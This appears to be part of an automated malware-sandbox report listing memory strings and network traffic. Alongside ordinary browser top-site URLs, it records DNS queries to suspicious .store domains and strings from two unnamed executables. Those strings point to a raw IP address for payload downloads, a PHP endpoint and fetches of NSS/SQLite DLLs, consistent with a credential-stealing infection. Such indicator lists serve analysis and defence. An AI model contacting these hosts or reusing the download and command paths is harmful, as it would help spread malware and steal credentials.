Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=en-US&feed_variant=default_spocs_offUpdateService:_selectAndInstallUpdate - update not supported for this system. Notifying observers. topic: update-available, status: unsupported equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000003.3141800421.000001B63DC80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3483013862.000001B63DC80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3499653000.000019553EF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3489841190.000001B63DFD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3480721237.000001B63DB36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == true(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) \|\| ((!os.isMac) && (version\|versionCompare('111.!') >= 0)))(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == true equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == true(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) \|\| ((!os.isMac) && (version\|versionCompare('111.!') >= 0)))(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == true equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == true(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) \|\| ((!os.isMac) && (version\|versionCompare('111.!') >= 0)))(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == true equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3446346586.000001B637764000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3446346586.000001B637764000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3446346586.000001B637764000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 0000001E.00000003.3148448305.000051F401188000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 0000001E.00000003.3148448305.000051F401188000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytcaogl equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.3499653000.000019553EF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3398991599.000001B63675D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3398991599.000001B6367AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3499653000.000019553EF00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.3398991599.000001B63672C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3398991599.000001B636744000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3370593805.000001B6364AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: x://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: presticitpo.store
Source: global traffic	DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic	DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic	DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic	DNS traffic detected: DNS query: necklacedmny.store
Source: global traffic	DNS traffic detected: DNS query: founpiuer.store
Source: global traffic	DNS traffic detected: DNS query: terracedjz.cyou
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: youtube.com
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: example.org
Source: global traffic	DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic	DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic	DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: www.youtube.com
Source: global traffic	DNS traffic detected: DNS query: www.facebook.com
Source: global traffic	DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic	DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic	DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic	DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic	DNS traffic detected: DNS query: www.reddit.com
Source: global traffic	DNS traffic detected: DNS query: twitter.com
Source: global traffic	DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic	DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: services.addons.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: normandy.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: normandy-cdn.services.mozilla.com

Source: unknown

HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4775Host: login.live.com

Source: firefox.exe, 0000001D.00000002.3439828011.000001B6374EA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3444672423.000001B637612000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3439828011.000001B6374E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3480721237.000001B63DB0B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3439828011.000001B6374EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.3439828011.000001B6374F4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3370593805.000001B636431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3444672423.000001B637604000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3444672423.000001B637618000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3315352593.000001B635576000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3439828011.000001B6374DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3439828011.000001B6374FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3191369944.000001B625D6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: 3e169c0a7e.exe, 00000009.00000003.3164057565.0000000000D7F000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3370421224.0000000005C2D000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3374266320.00000000013B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: 3e169c0a7e.exe, 0000000F.00000003.3370421224.0000000005C2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/G
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: 3e169c0a7e.exe, 3e169c0a7e.exe, 00000009.00000003.3164057565.0000000000D7F000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3373737801.00000000013E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 3e169c0a7e.exe, 0000000F.00000003.3373737801.00000000013E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeowFg
Source: 3e169c0a7e.exe, 3e169c0a7e.exe, 00000009.00000003.3164057565.0000000000D7F000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3373737801.00000000013E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: 3e169c0a7e.exe, 0000000F.00000003.3373737801.00000000013E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe(gM
Source: 3e169c0a7e.exe, 0000000F.00000003.3373737801.00000000013E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe~g
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.000000000160E000.00000004.00000020.00020000.00000000.sdmp, 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000D7E000.00000040.00000001.01000000.0000000C.sdmp, 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000BF6000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://185.215.113.206
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.000000000160E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206(
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001666000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6Y
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001666000.00000004.00000020.00020000.00000000.sdmp, 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000C24000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpBrowser
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpd
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000D7E000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpion:
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001666000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/freebl3.dll
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001666000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/mozglue.dll
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001666000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/mozglue.dllWR
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001666000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/msvcp140.dll#FM
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001666000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/msvcp140.dll2F
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001666000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/nss3.dll
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001666000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/softokn3.dll
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001666000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/softokn3.dllEF
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001666000.00000004.00000020.00020000.00000000.sdmp, 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000C24000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/sqlite3.dll
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001666000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/vcruntime140.dll
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001666000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/vcruntime140.dllXx
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000D7E000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://185.215.113.206tsadf523b719729.phpion:
Source: firefox.exe, 0000001D.00000002.3489841190.000001B63DFCF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 0000001D.00000002.3489841190.000001B63DFCF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 0000001D.00000002.3489841190.000001B63DFCF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 0000001D.00000002.3489841190.000001B63DFCF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: 3e169c0a7e.exe, 00000009.00000003.2932672578.000000000547D000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2960129987.0000000005B63000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3073834405.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3414137723.000001B636894000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 3e169c0a7e.exe, 00000009.00000003.2932672578.000000000547D000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2960129987.0000000005B63000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3073834405.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3414137723.000001B636894000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 0000001D.00000003.3097197709.000001B635DC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3330207750.000001B635DDA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3097956840.000001B635DC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001D.00000002.3290075534.000001B6336D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: 3e169c0a7e.exe, 00000009.00000003.2932672578.000000000547D000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2960129987.0000000005B63000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3073834405.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3414137723.000001B636894000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 3e169c0a7e.exe, 00000009.00000003.2932672578.000000000547D000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2960129987.0000000005B63000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3073834405.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3414137723.000001B636894000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 3e169c0a7e.exe, 00000009.00000003.2932672578.000000000547D000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2960129987.0000000005B63000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3073834405.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3414137723.000001B636894000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
